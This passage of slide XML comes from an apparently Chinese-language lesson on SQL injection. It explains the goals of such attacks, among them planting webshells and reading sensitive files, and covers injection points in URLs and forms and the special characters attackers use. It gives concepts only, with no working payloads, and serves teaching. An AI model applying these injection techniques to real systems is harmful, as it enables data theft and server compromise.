              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>植入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，获取服务器后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取服务器敏感文件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SQL注入过程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497840" y="736600"/>
            <a:ext cx="6319520" cy="6012180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="直接连接符 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3313430" y="1748790"/>
            <a:ext cx="1245235" cy="17145"/>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a:off x="3936047" y="2310765"/>
            <a:ext cx="1245235" cy="17145"/>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11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6816725" y="736600"/>
            <a:ext cx="5255895" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>把sql 命令插入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web 表单提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>域名或页面请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的查询字符串</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9046210" y="2045335"/>
            <a:ext cx="2116455" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>WHY CAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6817995" y="2940685"/>
            <a:ext cx="5373370" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL查询支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and、or、union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等多种查询方法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>逻</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>辑运算的优先顺序是NOT&gt;AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt;OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，攻击者可以通过这些方法，将恶意执行语句拼接到正常的查询语句中去。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="下箭头 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9768840" y="1765935"/>
            <a:ext cx="382270" cy="381635"/>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下箭头 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9811385" y="2499995"/>
            <a:ext cx="382270" cy="381635"/>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6" name="下箭头 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13800000">
            <a:off x="5904865" y="1430655"/>
            <a:ext cx="382270" cy="65278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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6818630" y="4995545"/>
            <a:ext cx="5372735" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>注入攻击需要满足两个条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户能够控制输入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原本程序要执行的代码，拼接了用户输入的恶意数据。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bldLvl="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" bldLvl="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SQL注入位置</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="781685"/>
            <a:ext cx="5059680" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户在什么位置向数据库传递参数？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1560195"/>
            <a:ext cx="7505700" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="4169410"/>
            <a:ext cx="7506335" cy="2273935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807575" y="2472690"/>
            <a:ext cx="1596390" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址栏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9807575" y="5076190"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表单提交</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7663815" y="781685"/>
            <a:ext cx="1097280" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="左箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7252335" y="936625"/>
            <a:ext cx="339090" cy="221615"/>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37055" y="1130935"/>
            <a:ext cx="9276080" cy="4164330"/>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9593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Web</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应用基本架构</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19505" y="1053465"/>
            <a:ext cx="10229850" cy="359092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SQL查询语句</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589530" y="4644390"/>
            <a:ext cx="792480" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962775" y="4644390"/>
            <a:ext cx="792480" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824480" y="5431155"/>
            <a:ext cx="6543040" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入本质：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码与数据混合在一起</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码是可信的，数据是不可信的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232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SQL代码中特殊字符</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102485" y="1398270"/>
            <a:ext cx="2540000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aNd，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403725" y="1558925"/>
            <a:ext cx="2011680" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大小写不敏感</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102485" y="2688590"/>
            <a:ext cx="1787525" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/* .......... */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403725" y="2847975"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>多行注释</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243455" y="3326130"/>
            <a:ext cx="1646555" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=，&lt;&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102485" y="2043430"/>
            <a:ext cx="4406265" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（双引号）， ‘ ’（单引号）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403725" y="3476625"/>
            <a:ext cx="1588770" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不等于</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="753110"/>
            <a:ext cx="2540000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
